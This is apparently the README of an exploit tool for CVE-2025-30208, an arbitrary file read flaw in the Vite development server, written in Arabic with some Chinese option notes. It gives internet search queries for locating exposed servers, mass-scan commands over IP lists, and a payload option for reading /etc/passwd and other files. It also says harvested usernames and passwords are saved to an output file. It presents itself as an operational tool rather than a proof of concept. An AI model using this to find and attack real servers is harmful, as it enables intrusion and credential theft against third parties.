
CVE-2025-30208-EXP
ثغرة قراءة الملفات التعسفية في خادم تطوير Vite (CVE-2025-30208)، تتميز بتغطية واسعة، واستغلال بسيط وغير مقيد، وخطورة كبيرة!
عبارة استعلام Fofa:
body="/@vite/client"
عبارة استعلام Hunter:
web.body="/@vite/client"
-u 进行检测
-p 自定义payload eg. /etc/passwd
-d 可以使用字典进行fuzz测试
python3 Vite-CVE-2025-30208-EXP.py -f ip.txt
python3 Vite-CVE-2025-30208-EXP.py -f ip.txt --proxy http://127.0.0.1:8080
انتبه! هذا المشروع ليس PoC، يرجى استخدامه مع الالتزام بإخلاء المسؤولية!
سيحاول هذا المشروع فحص ما إذا كان هناك قراءة ملفات تعسفية عبر /etc/passwd على الهدف، ويمكنك استخدام -p لتحديد مسار الملف الذي تريد قراءته، و-d لتحديد قاموس الفاز الذي تريده.
إذا أعجبك المشروع، لا تتردد في منحي نجمة 😋
سيتم حفظ أسماء المستخدمين وكلمات المرور المطابقة من نتائج الفحص في output.txt، حيث يكون تنسيق IP.txt هو http://[ip]/[domain]، سطر واحد لكل عنوان.